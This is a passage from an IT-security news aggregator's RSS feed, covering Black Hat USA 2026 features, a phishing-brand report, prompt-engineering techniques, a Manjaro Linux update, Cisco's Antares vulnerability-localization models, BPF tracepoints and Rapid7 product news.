
This video walks through some of our new features, the team building them explain what's coming and why it matters: 

Arsenal...]]></description>
<link>https://tsecurity.de/de/3689244/it-security-video/black-hat-usa-2026-new-features/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689244/it-security-video/black-hat-usa-2026-new-features/</guid>
<pubDate>Thu, 23 Jul 2026 15:57:16 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Black Hat - Bewertung: 2x - Views:21 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/E6mtjQ53HjM?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Black Hat USA 2026 isn't just bigger... It's built differently, and Black Hat is closing the gap between knowing and doing.  <br />
<br />
This video walks through some of our new features, the team building them explain what's coming and why it matters: <br />
<br />
Arsenal Labs is reunited with Arsenal. The Interface showcases CTF arenas, including scenarios across healthcare, retail, and more, VR breach investigations, and escape rooms. Our NOC Outpost allows you to step beyond the glass and work alongside the team protecting the event in real time. Bricks and Picks introduces real-world physical security scenarios. The Main Stage moves to the Business Hall floor. A First-Timers Program launches for anyone walking into their first Black Hat. Networking is easier throughout the new Cyber District. <br />
<br />
Timestamps: <br />
0:00 — Why 2026 is different: active learning, hands-on experiences <br />
2:06 — Arsenal + Arsenal Labs: 115 sessions, Drone Zone, The Lab, The Interface <br />
5:51 — Summit Leaders Lounge, Community Conversations, Picture Point <br />
8:21 — NOC Outpost: step beyond the glass, see agentic AI in action <br />
9:48 — Bricks and Picks: lock picking + Lego, physical security scenarios <br />
12:19 — Main Stage + Startup Spotlight (now a global competition) <br />
13:51 — Startup City + AI Zone content stages <br />
16:09 — First-Timers Program (Tuesday 5-7pm) <br />
16:54 — Cyber District: 13 sponsor venues across the week <br />
<br />
Black Hat USA 2026 <br />
August 1–6, 2026 | Las Vegas <br />
Register at blackhat.com <br />
Full feature breakdown: Black Hat USA 2026 | Features <br />
<br />
One Step Ahead. <br />
<br />
  <br />
<br />
Black Hat USA 2026 <br />
August 1–6, 2026 | Las Vegas <br />
Register at blackhat.com <br />
Full feature breakdown: Black Hat USA 2026 | Features <br />
<br />
  <br />
<br />
One Step Ahead.<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Which Brands Are Impersonated Most? Inside the Q2 2026 Brand Phishing Report]]></title>
<description><![CDATA[Key Takeaways Microsoft continues to be the single most impersonated brand in Q2 2026, appearing in 23% of all brand phishing attempts, far ahead of any other company The top five impersonated brands, Microsoft, LinkedIn, Google, Apple, and Amazon, together account for more than half of all brand...]]></description>
<link>https://tsecurity.de/de/3689145/it-security-nachrichten/which-brands-are-impersonated-most-inside-the-q2-2026-brand-phishing-report/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689145/it-security-nachrichten/which-brands-are-impersonated-most-inside-the-q2-2026-brand-phishing-report/</guid>
<pubDate>Thu, 23 Jul 2026 15:14:53 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img width="2000" height="700" src="https://blog.checkpoint.com/wp-content/uploads/2023/12/featured-image-default-c.jpg" class="webfeedsFeaturedVisual default-featured-img" alt="" link_thumbnail="" decoding="async" srcset="https://blog.checkpoint.com/wp-content/uploads/2023/12/featured-image-default-c.jpg 2000w, https://blog.checkpoint.com/wp-content/uploads/2023/12/featured-image-default-c-300x105.jpg 300w, https://blog.checkpoint.com/wp-content/uploads/2023/12/featured-image-default-c-1024x358.jpg 1024w, https://blog.checkpoint.com/wp-content/uploads/2023/12/featured-image-default-c-768x269.jpg 768w, https://blog.checkpoint.com/wp-content/uploads/2023/12/featured-image-default-c-1536x538.jpg 1536w, https://blog.checkpoint.com/wp-content/uploads/2023/12/featured-image-default-c-400x140.jpg 400w, https://blog.checkpoint.com/wp-content/uploads/2023/12/featured-image-default-c-1320x462.jpg 1320w" sizes="(max-width: 2000px) 100vw, 2000px"><p>Key Takeaways Microsoft continues to be the single most impersonated brand in Q2 2026, appearing in 23% of all brand phishing attempts, far ahead of any other company The top five impersonated brands, Microsoft, LinkedIn, Google, Apple, and Amazon, together account for more than half of all brand phishing attempts tracked this quarter Open AI’s ChatGPT entered the top ten most impersonated brands for the first time, signaling that AI tools are now firmly on criminals’ radar Technology was the most targeted industry overall, followed by Social Networks and Banking Real world cases this quarter ranged from fake payment failure […]</p>
<p>The post <a href="https://blog.checkpoint.com/research/which-brands-are-impersonated-most-inside-the-q2-2026-brand-phishing-report/">Which Brands Are Impersonated Most? Inside the Q2 2026 Brand Phishing Report</a> appeared first on <a href="https://blog.checkpoint.com/">Check Point Blog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Stop asking AI nicely: Here’s how to get work-ready results every time]]></title>
<description><![CDATA[Over the past few years, I have learned that basic prompts produce inconsistent, hallucination-prone results that no executive would trust in production. What turned the tide was my move to advanced prompting techniques. These weren’t theoretical experiments; they became a practical foundation fo...]]></description>
<link>https://tsecurity.de/de/3688796/it-nachrichten/stop-asking-ai-nicely-heres-how-to-get-work-ready-results-every-time/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688796/it-nachrichten/stop-asking-ai-nicely-heres-how-to-get-work-ready-results-every-time/</guid>
<pubDate>Thu, 23 Jul 2026 13:07:21 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Over the past few years, I have learned that basic prompts produce inconsistent, hallucination-prone results that no executive would trust in production. What turned the tide was my move to advanced prompting techniques. These weren’t theoretical experiments; they became a practical foundation for reliable, measurable outcomes. I want to share the techniques that consistently delivered the biggest gains in my projects, complete with real before-and-after examples, copy-paste templates, lessons from failures and guidance on when to evolve beyond prompting to agentic systems.</p>



<h2 class="wp-block-heading">Why advanced prompting still matters in enterprise settings</h2>



<p class="wp-block-paragraph">Sophisticated prompting remains essential for control, reliability and compliance. If you “ask nicely” and hope for the best, you need deterministic behavior, auditable reasoning and minimal risk of hallucination. Here’s what worked for me.</p>



<h3 class="wp-block-heading">1. Chain-of-Thought (CoT) and its variants: Unlocking step-by-step reasoning</h3>



<p class="wp-block-paragraph"><strong>The problem:</strong> Models would jump to conclusions on complex analysis tasks, especially involving data interpretation or multi-step logic.</p>



<p class="wp-block-paragraph"><strong>What I did:</strong> I started explicitly instructing the model to “think step by step” and show its reasoning.</p>



<p class="wp-block-paragraph"><strong>Before (basic prompt): </strong>“Analyze last quarter’s sales data and recommend three actions.”</p>



<p class="wp-block-paragraph"><strong>After (CoT prompt):</strong></p>



<p class="wp-block-paragraph">“You’re a senior business analyst. Analyze the following sales data step by step: [data]. First, identify the key trends. Second, calculate the rates and anomalies. Third, link findings to business context. Finally, recommend the three prioritized actions with expected impact. Explain your reasoning at each step.”  </p>



<p class="wp-block-paragraph"><strong>Results:</strong> Accuracy and depth improved dramatically.</p>



<p class="wp-block-paragraph"><strong>Variants that worked well:</strong> Self-consistency. I ran the same CoT prompt multiple times and took the majority consensus. This reduced variability significantly.</p>



<p class="wp-block-paragraph"><strong>Template you can use:</strong></p>



<pre class="wp-block-code"><code>You are [expert role]. Solve this problem by thinking step by step.

[Task or question]

For each step:

1. State your observation or calculation.

2. Explain the implication.

3. Proceed only when confident.

Final answer in this format: [structured output]</code></pre>



<h3 class="wp-block-heading">2. Tree-of-Thoughts (ToT): Exploring multiple reasoning paths</h3>



<p class="wp-block-paragraph">For truly complex decisions such as resource allocation or risk assessment, linear CoT isn’t enough. Tree-of-Thoughts lets the model generate and evaluate multiple branches.</p>



<p class="wp-block-paragraph"><strong>Example:</strong> I was helping a client evaluate three potential vendor platforms for an AI deployment. A standard prompt gave a superficial comparison. With ToT</p>



<p class="wp-block-paragraph"><strong>Prompt Snippet:</strong></p>



<pre class="wp-block-code"><code>Explore three different reasoning paths for selecting the best vendor platform:

Path 1: Focus on cost and scalability.

Path 2: Focus on security, compliance and integration.

Path 3: Focus on innovation and long-term roadmap.

For each path, evaluate pros/cons against our requirements [list].

Then, compare the paths and recommend the strongest overall option with justification.</code></pre>



<p class="wp-block-paragraph"><strong>Outcome:</strong> The model surfaced nuanced trade-offs (e.g., one vendor had superior security, but higher integration cost).</p>



<p class="wp-block-paragraph"><strong>When to use:</strong> Strategic planning, troubleshooting or scenarios with high uncertainty and multiple viable approaches.</p>



<h3 class="wp-block-heading">3. ReAct (Reason+ Act) and prompt chaining: Moving toward agentic behavior</h3>



<p class="wp-block-paragraph">One of the biggest leaps I have noticed comes from combining reasoning with tool use and chaining prompts.</p>



<p class="wp-block-paragraph"><strong>ReAct example</strong>: (used in data analytics workflow)</p>



<pre class="wp-block-code"><code>You are an AI analyst with access to tools. For the query below:

1. Reason about what information you need.

2. Choose the appropriate tool or action.

3. Observe the result.

4. Repeat until you can answer confidently.

Query: [user request]</code></pre>



<p class="wp-block-paragraph">In practice, I chained this with retrieval tools. One automated quarterly compliance reporting; the system reasoned about required data, pulled relevant records, validated them, and generated the reports.</p>



<h3 class="wp-block-heading">4. Meta-prompting and self-reflection: Letting the model improve itself</h3>



<p class="wp-block-paragraph">Use the model to refine its own prompt. This is a huge time-saver.</p>



<pre class="wp-block-code"><code>You are an expert prompt engineer. Improve the following prompt for clarity, structure and effectiveness with [target model]. Make it more precise while preserving intent.

Original prompt: [paste]

Provide the improved version and explain your changes.</code></pre>



<p class="wp-block-paragraph">Self-reflection loops (asking the model to critique its own output and revise) are a game-changer for content generation and code-review tasks.</p>



<h3 class="wp-block-heading">5. Multimodal and structured output techniques</h3>



<p class="wp-block-paragraph">With vision-enabled models, I started combining text with images (e.g., uploading architecture diagrams or dashboards).</p>



<p class="wp-block-paragraph"><strong>Tip from experience:</strong> Be extremely specific in describing what the models should focus on.</p>



<h4 class="wp-block-heading">Best practices I learned the hard way</h4>



<ul class="wp-block-list">
<li><strong>Start simple, then layer complexity</strong>: Over-engineered prompts from Day One usually backfire.</li>



<li><strong>Model specific tuning:</strong> Some models respond better to XML delimiters; others to explicit reasoning.</li>



<li><strong>Evaluation and versioning:</strong> Treat prompts like code if you track versions and run automated evals.</li>



<li><strong>Security guardrails:</strong> Always include instructions against prompt injections and respect data boundaries.</li>



<li><strong>When to stop prompting</strong>: For repetitive, high-stakes workflows, move to full agents or an orchestration framework.</li>
</ul>



<h2 class="wp-block-heading">Final takeaways for technical leaders</h2>



<p class="wp-block-paragraph">Advanced prompt engineering has now become a core competency for anyone responsible for enterprise AI outcomes. Start by picking one technique and apply it rigorously to a real business problem. Document before/ after and you will notice why it’s worth mastering.</p>



<p class="wp-block-paragraph">The field continues evolving towards more automated and agentic systems, but the ability to precisely direct AI reasoning remains foundational.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[[Stable Update] 2026-07-23 - Kernels, Mesa, VirtualBox, Gambas3, COSMIC, Plasma, KDE Frameworks]]></title>
<description><![CDATA[Hello Manjaro user community, here we have another set of package updates. We are continuing our development of the upcoming release of ‘Bian-May’ which can be expected end of July or beginning of August. Development speed may be a little slower the upcoming weeks. However, still let us know any ...]]></description>
<link>https://tsecurity.de/de/3688271/unix-server/stable-update-2026-07-23-kernels-mesa-virtualbox-gambas3-cosmic-plasma-kde-frameworks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688271/unix-server/stable-update-2026-07-23-kernels-mesa-virtualbox-gambas3-cosmic-plasma-kde-frameworks/</guid>
<pubDate>Thu, 23 Jul 2026 09:31:27 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div data-theme-toc="true"> </div>
<p>Hello Manjaro user community, here we have another set of package updates. We are continuing our development of the upcoming release of ‘Bian-May’ which can be expected end of July or beginning of August. Development speed may be a little slower the upcoming weeks. However, still let us know any issues you may found thus far.</p>
<h3><a name="p-867467-current-promotions-1" class="anchor" href="https://forum.manjaro.org/#p-867467-current-promotions-1" aria-label="Heading link"></a>Current Promotions</h3>
<ul>
<li>Get the latest Gaming Laptop by Slimbook powered by Manjaro: <a href="https://slimbook.com/manjaro">Slimbook Manjaro III</a></li>
<li>Protect your personal data, keep yourself safe with Surfshark VPN: <a href="https://get.surfshark.net/aff_c?offer_id=6&amp;aff_id=14558-">See current promotion</a></li>
</ul>
<h2><a name="p-867467-recent-news-2" class="anchor" href="https://forum.manjaro.org/#p-867467-recent-news-2" aria-label="Heading link"></a>Recent News</h2>

New in Manjaro GNOME!
Or, if you prefer the command line: <a href="https://forum.manjaro.org/t/stable-update-2026-07-23-kernels-mesa-virtualbox-gambas3-cosmic-plasma-kde-frameworks/189137/1">(click for more details)</a>

KDE Plasma users with SDDM can now migrate to Plasma Login Manager <a href="https://forum.manjaro.org/t/stable-update-2026-07-23-kernels-mesa-virtualbox-gambas3-cosmic-plasma-kde-frameworks/189137/1">(click for more details)</a>

NVIDIA 590 driver drops Pascal support <a href="https://forum.manjaro.org/t/stable-update-2026-07-23-kernels-mesa-virtualbox-gambas3-cosmic-plasma-kde-frameworks/189137/1">(click for more details)</a>
<ul>
<li><a href="https://forum.manjaro.org/t/manjaro-26-1-bian-may-preview-released/187389" class="inline-onebox">Manjaro 26.1 Bian-May - Preview released</a></li>
<li><a href="https://forum.manjaro.org/t/manjaro-26-0-anh-linh-released/184526" class="inline-onebox">Manjaro 26.0 Anh-Linh released</a></li>
<li><a href="https://forum.manjaro.org/t/manjaro-summit-public-alpha-now-available/176995" class="inline-onebox">Manjaro Summit public Alpha now available</a></li>
<li>As of Linux 5.4.302, the 5.4 series is now EOL (End Of Life). Please install 5.10 LTS (Long Term Support) or 5.15 LTS.</li>
<li>As of Linux 6.16.12, the 6.16 series is now EOL (End Of Life). Please install 6.18 LTS (Long Term Support) and/or 6.12 LTS.</li>
<li>As of Linux 6.17.13, the 6.17 series is now EOL (End Of Life). Please install 6.18 LTS (Long Term Support) and/or 6.12 LTS.</li>
<li>As of Linux 6.19.14, the 6.19 series is now EOL (End Of Life). Please install 7.0, and/or 6.18 LTS (Long Term Support) and/or 6.12 LTS.</li>
<li>As of Linux 7.0.14, the 7.0 series is now EOL (End Of Life). Please install 7.1, and/or 6.18 LTS (Long Term Support) and/or 6.12 LTS.</li>
</ul>

Previous News <a href="https://forum.manjaro.org/t/stable-update-2026-07-23-kernels-mesa-virtualbox-gambas3-cosmic-plasma-kde-frameworks/189137/1">(click for more details)</a>
<h2><a name="p-867467-notable-package-updates-3" class="anchor" href="https://forum.manjaro.org/#p-867467-notable-package-updates-3" aria-label="Heading link"></a>Notable Package Updates</h2>
<ul>
<li><strong>Kernels</strong></li>
<li><strong>Mesa</strong> <a href="https://docs.mesa3d.org/relnotes/26.1.5.html">26.1.5</a></li>
<li><strong>VirtualBox</strong> <a href="https://www.virtualbox.org/wiki/Changelog-7.2">7.2.14</a></li>
<li><strong>Gambas3</strong> <a href="https://gambaswiki.org/wiki/doc/release/3.22.0">3.22.0</a></li>
<li><strong>Qemu</strong> <a href="https://wiki.qemu.org/ChangeLog/11.0">11.0.2</a></li>
<li><strong>PipeWire</strong> <a href="https://gitlab.freedesktop.org/pipewire/pipewire/-/releases/1.6.8">1.6.8</a></li>
<li><strong>Firefox</strong> <a href="https://www.firefox.com/en-US/firefox/152.0.6/releasenotes/">152.0.6</a></li>
<li><strong>KDE Frameworks</strong> <a href="https://kde.org/announcements/frameworks/6/6.28.0/">6.28.0</a></li>
<li><strong>KDE Plasma</strong> <a href="https://kde.org/announcements/plasma/6/6.7.3/">6.7.3</a></li>
<li><strong>COSMIC</strong> Epoch <a href="https://github.com/pop-os/cosmic-epoch/releases/tag/epoch-1.3.0">1.3.0</a></li>
<li><strong>GStreamer</strong> <a href="https://gstreamer.freedesktop.org/releases/1.28/#1.28.5">1.28.5</a></li>
<li><strong>Wine</strong> <a href="https://www.winehq.org/news/2026071001">11.13</a></li>
</ul>
<h2><a name="p-867467-additional-info-4" class="anchor" href="https://forum.manjaro.org/#p-867467-additional-info-4" aria-label="Heading link"></a>Additional Info</h2>

Python 3.14 info <a href="https://forum.manjaro.org/t/stable-update-2026-07-23-kernels-mesa-virtualbox-gambas3-cosmic-plasma-kde-frameworks/189137/1">(click for more details)</a>

Info about AUR packages <a href="https://forum.manjaro.org/t/stable-update-2026-07-23-kernels-mesa-virtualbox-gambas3-cosmic-plasma-kde-frameworks/189137/1">(click for more details)</a>
<p>Get our latest daily developer images now from Github: <a href="https://github.com/manjaro-plasma/download/releases">Plasma</a>, <a href="https://github.com/manjaro-gnome/download/releases">GNOME</a>, <a href="https://github.com/manjaro-xfce/download/releases">XFCE</a>. You can get the latest <a href="https://manjaro.org/download">stable releases</a> of Manjaro from <a href="https://cdn77.com/">CDN77</a>.</p>
<hr>
<p><strong>Our current supported kernels</strong></p>
<ul>
<li>linux61 6.1.177</li>
<li>linux66 6.6.144</li>
<li>linux612 6.12.96</li>
<li>linux618 6.18.39</li>
<li>linux71 7.1.4</li>
<li>linux72 7.2.0-rc4</li>
<li>linux61-rt 6.1.167_rt62</li>
<li>linux66-rt 6.6.135_rt74</li>
<li>linux612-rt 6.12.89_rt18</li>
</ul>
<p><strong>Package Changes</strong> (7/22/26 05:45 CEST)</p>
<ul>
<li>stable core x86_64:  71 new and 71 removed package(s)</li>
<li>stable extra x86_64:  1982 new and 2071 removed package(s)</li>
<li>stable multilib x86_64:  32 new and 32 removed package(s)</li>
</ul>
<p>A list of all package changes can be found <a href="https://gist.github.com/hphilm/2af362883e023aba0750a9455d3fbd2f/raw">here</a>.</p>
<p><a href="https://forum.manjaro.org/t/stable-update-2026-07-23-kernels-mesa-virtualbox-gambas3-cosmic-plasma-kde-frameworks/189137/1">Click to view the poll.</a></p>
<p>Check if your mirror has already synced:</p>
<ul>
<li><a href="https://repo.manjaro.org/">Mirror-Check Service</a></li>
</ul>
<hr>
            <p><small>3 posts - 2 participants</small></p>
            <p><a href="https://forum.manjaro.org/t/stable-update-2026-07-23-kernels-mesa-virtualbox-gambas3-cosmic-plasma-kde-frameworks/189137">Read full topic</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Cisco’s new AI model tells code reviewers where to look for vulnerabilities]]></title>
<description><![CDATA[Cisco has revealed a family of open-weight AI models called Antares that, it said, can help security teams isolate potentially vulnerable parts of a software repository before deeper investigation begins.



Rather than detecting a specific CVE or generating a patch, these models search a codebas...]]></description>
<link>https://tsecurity.de/de/3687065/it-security-nachrichten/ciscos-new-ai-model-tells-code-reviewers-where-to-look-for-vulnerabilities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687065/it-security-nachrichten/ciscos-new-ai-model-tells-code-reviewers-where-to-look-for-vulnerabilities/</guid>
<pubDate>Wed, 22 Jul 2026 18:54:39 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Cisco has revealed a family of open-weight AI models called Antares that, it said, can help security teams isolate potentially vulnerable parts of a software repository before deeper investigation begins.</p>



<p class="wp-block-paragraph">Rather than detecting a specific CVE or generating a patch, these models search a codebase using only a Common Weakness Enumeration (CWE) description and return the files most likely to contain that class of vulnerability.</p>



<p class="wp-block-paragraph">“Its purpose is to reduce a large codebase to a focused set of files that a security professional or a downstream security workflow should investigate,” Cisco’s AI researcher <a href="https://www.linkedin.com/in/supriti-vijay/" target="_blank" rel="noreferrer noopener">Supriti Vijay</a> said via email. “The goal is not to replace a security engineer’s judgement or send them on a wild-goose chase, but to reduce fatigue and workload by helping them triage an issue earlier and focus their investigation on the most relevant parts of the codebase.”</p>



<p class="wp-block-paragraph">The Antares family consists of models with 350 million, 1 billion, and 3 billion parameters trained specifically for repository-scale vulnerability localization.</p>



<p class="wp-block-paragraph">The company said its largest model approaches the performance of GPT-5.5 on its internal vulnerability localization (Vloc) benchmark while remaining small enough for low-cost local deployment.</p>



<h2 class="wp-block-heading">A search assistant, not a vulnerability detector</h2>



<p class="wp-block-paragraph">Cisco is careful to define what Antares is, and what it is not.</p>



<p class="wp-block-paragraph">“Antares outputs a ranked list of source files likely to contain a relevant vulnerability, along with the terminal exploration trace that led to that result,” Cisco Foundation AI Chief Scientist <a href="https://www.linkedin.com/in/amin-karbasi-5025335/" target="_blank" rel="noreferrer noopener">Amin Karbasi</a> wrote in a blog post, adding that the models are not meant to replace the broader application security toolchain: Human analysts or downstream security tools will still be needed to confirm exploitability, <a href="https://www.infoworld.com/article/4200083/gitlab-previews-auto-remediation-of-vulnerable-dependencies.html">identify vulnerable lines of code</a>, assess severity and generate fixes.</p>



<p class="wp-block-paragraph">Antares differs from conventional static analysis platforms such as Semgrep or CodeQL, which primarily rely on predefined rules or queries. Cisco instead describes Antares as an evidence-driven exploration agent that adapts its search as it traverses the repository.</p>



<p class="wp-block-paragraph">Cisco’s argument is that large repositories often contain thousands of files, making manual reviews exhaustive and unrealistic. By reducing the search space to a manageable shortlist, the company hopes to reduce investigation fatigue without replacing human judgement.</p>



<h2 class="wp-block-heading">Claims of specialization over scale</h2>



<p class="wp-block-paragraph">Cisco is also making a statement about how cybersecurity models should evolve.</p>



<p class="wp-block-paragraph">Instead of pursuing larger foundational models, Cisco argued that specialized, task-trained models can outperform much larger open-weight alternatives for vulnerability localization. In its evaluation Antares-3B, the largest model intended for single-GPU deployments, produced results comparable to GPT-5.5 while outperforming several substantially larger open models by Google, OpenAI and Meta.</p>



<p class="wp-block-paragraph">The family also includes Antares-350M for resource-constrained environments and Antares-1B for laptops and workstations, which Cisco has made available as open-weight models on Hugging Face.</p>



<p class="wp-block-paragraph">The command line interface (CLI) on the models supports targeted CWE investigations, repository-wide scans, SARIF output and local inference, which Cisco said enables organizations to keep proprietary code inside their own trust boundary.</p>



<p class="wp-block-paragraph">However, because Antares identifies candidate files rather than confirmed vulnerabilities, organizations will still need to understand how often such repository-wide searches should be run, how much they improve existing triage workflows, and whether the reduction in investigation effort ultimately translates into measurable security or cost benefits.</p>



<p class="wp-block-paragraph"><em>This article first appeared on <a href="https://www.infoworld.com/article/4200143/ciscos-new-ai-model-tells-code-reviewers-where-to-look-for-vulnerabilities.html">InfoWorld</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[[$] Attaching programs to multiple tracepoints]]></title>
<description><![CDATA[Tracepoints in the kernel are useful for a variety of purposes: debugging,
active monitoring, and performance measurements, among other things. Previously,
any given BPF program could only be attached to a single tracepoint.
Jiri Olsa has been working to change that, and led a discussion about
hi...]]></description>
<link>https://tsecurity.de/de/3686771/linux-tipps/attaching-programs-to-multiple-tracepoints/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686771/linux-tipps/attaching-programs-to-multiple-tracepoints/</guid>
<pubDate>Wed, 22 Jul 2026 17:09:16 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>
Tracepoints in the kernel are useful for a variety of purposes: debugging,
active monitoring, and performance measurements, among other things. Previously,
any given BPF program could only be attached to a single tracepoint.
Jiri Olsa has been working to change that, and led a discussion about
his progress at the 2026
<a href="https://events.linuxfoundation.org/lsfmmbpf/">
Linux Storage, Filesystem, Memory-Management, and BPF
Summit</a>. That work has since been
<a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=c49f336dbcf30ff8622d3725c54fe1c90e8ccd9c">
merged</a>, and can be expected as part of the 7.2
kernel.
</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[What’s New in Rapid7 Products and Services: Q2 2026 in Review]]></title>
<description><![CDATA[If Q1 set the pace for Rapid7's tools, Q2 accelerated it. This quarter brought a steady stream of product enhancements, platform investments, and customer-driven innovation across Rapid7’s portfolio. Each release was designed with a clear goal in mind: helping security teams reduce complexity whi...]]></description>
<link>https://tsecurity.de/de/3686659/it-security-nachrichten/whats-new-in-rapid7-products-and-services-q2-2026-in-review/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686659/it-security-nachrichten/whats-new-in-rapid7-products-and-services-q2-2026-in-review/</guid>
<pubDate>Wed, 22 Jul 2026 16:30:13 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><span>If Q1 set the pace for Rapid7's tools, Q2 accelerated it. This quarter brought a steady stream of product enhancements, platform investments, and customer-driven innovation across Rapid7’s portfolio. Each release was designed with a clear goal in mind: helping security teams reduce complexity while increasing speed, context, and confidence in their day-to-day operations. Here’s a closer look at what launched in Q2.</span></p><h2>Detection and response</h2><h3><span>Streamline investigations with bidirectional and enriched Microsoft Defender alerts</span></h3><p><span>Bidirectional synchronization and enriched alert context for Microsoft Defender is now generally available for SIEM and </span><a href="https://www.rapid7.com/services/managed-detection-and-response-mdr/" target="_self"><span>MDR</span></a><span> customers, enabling security teams to automatically synchronize alert status between Rapid7's </span><a href="https://www.rapid7.com/products/siem" target="_self"><span>SIEM</span></a><span> and the Microsoft Defender console. With added process tree and user identity context, analysts can investigate threats more efficiently while reducing manual effort.</span></p><h3><span>Confidently scale detection engineering with Detection as Code</span></h3><p><a href="https://www.rapid7.com/blog/post/dr-scaling-engineering-detection-as-code" target="_self"><span>Detection as Code</span></a><span> enables security teams to build, test, version, and deploy detections using Terraform and modern engineering workflows. Built-in validation, guardrails, and version control help teams deliver higher-quality alerts, maintain more consistent coverage, and scale detection engineering more effectively.</span></p><p></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt5b87b1b66cb42fb0/6a60c7d908c174e1555adb14/image2.png" alt="rapid7-detection-as-code-methodology.png" caption="Figure 1: Rapid7's Detection as Code methodology." height="713" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="rapid7-detection-as-code-methodology.png" width="1553" max-width="1553" max-height="713" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt5b87b1b66cb42fb0/6a60c7d908c174e1555adb14/image2.png" data-sys-asset-uid="blt5b87b1b66cb42fb0" data-sys-asset-filename="image2.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 1: Rapid7's Detection as Code methodology." data-sys-asset-alt="rapid7-detection-as-code-methodology.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 1: Rapid7's Detection as Code methodology.</figcaption></div></figure><p></p><h3><span>Strengthen ransomware resilience with Ransomware Prevention for Incident Command</span></h3><p><span>Ransomware Prevention for </span><a href="https://www.rapid7.com/products/siem" target="_self"><span>Incident Command</span></a><span> adds an intent-based layer of protection designed to stop ransomware encryption and endpoint damage before they disrupt operations. Built into the Insight Agent, this capability strengthens ransomware resilience while working alongside existing endpoint security investments, without adding operational complexity.</span></p><h2>Compliance</h2><h3>New solutions webpages</h3><p><span>Across the globe, cybersecurity regulation is shifting away from static compliance checklists and toward ongoing risk management that blends proactive defense with effective detection and response. Rapid7’s </span><a href="https://www.rapid7.com/platform" target="_self"><span>platform</span></a><span>, which brings exposure management and CTEM together with detection, response, and MDR, is well positioned to help organizations operationalize compliance across mandates such as NIS2, NIST CSF 2.0, DORA, HIPAA, HITRUST, and GovRAMP. To support that effort, Rapid7 has launched an updated library of dedicated compliance solution pages that map platform capabilities to the requirements that matter most across industries and regions. The first set of pages is live now, with more to follow in the coming weeks.</span></p><ul><li><p><a href="https://www.rapid7.com/solutions/compliance/nist-csf-2" target="_self"><span>NIST CSF 2.0</span></a></p></li><li><p><a href="https://www.rapid7.com/solutions/compliance/hipaa" target="_self"><span>HIPAA</span></a></p></li><li><p><a href="https://www.rapid7.com/solutions/compliance/hitrust" target="_self"><span>HITRUST</span></a></p></li><li><p><a href="https://www.rapid7.com/solutions/compliance/nis2" target="_self"><span>NIS2</span></a></p></li><li><p><a href="https://www.rapid7.com/blog/post/www.rapid7.com/solutions/compliance/govramp" target="_self"><span>GovRAMP</span></a></p></li></ul><p></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blta8db9b364598a181/6a60c98604258068dc0bf302/rapid7-govramp-compliance.png" alt="rapid7-govramp-compliance.png" caption="Figure 2: Rapid7's new GovRAMP compliance solutions page." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="rapid7-govramp-compliance.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blta8db9b364598a181/6a60c98604258068dc0bf302/rapid7-govramp-compliance.png" data-sys-asset-uid="blta8db9b364598a181" data-sys-asset-filename="rapid7-govramp-compliance.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 2: Rapid7's new GovRAMP compliance solutions page." data-sys-asset-alt="rapid7-govramp-compliance.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 2: Rapid7's new GovRAMP compliance solutions page.</figcaption></div></figure><h2>Exposure management</h2><h3><span>Turn prioritized exposures into remediation progress</span></h3><p><span>We improved Remediation Hub to help teams turn prioritized exposures into more actionable remediation progress. Updates to the Top Remediations Report add asset-level context, including operating system, IP address, cloud provider, tags, endpoint protection, and patch management details, so teams can better 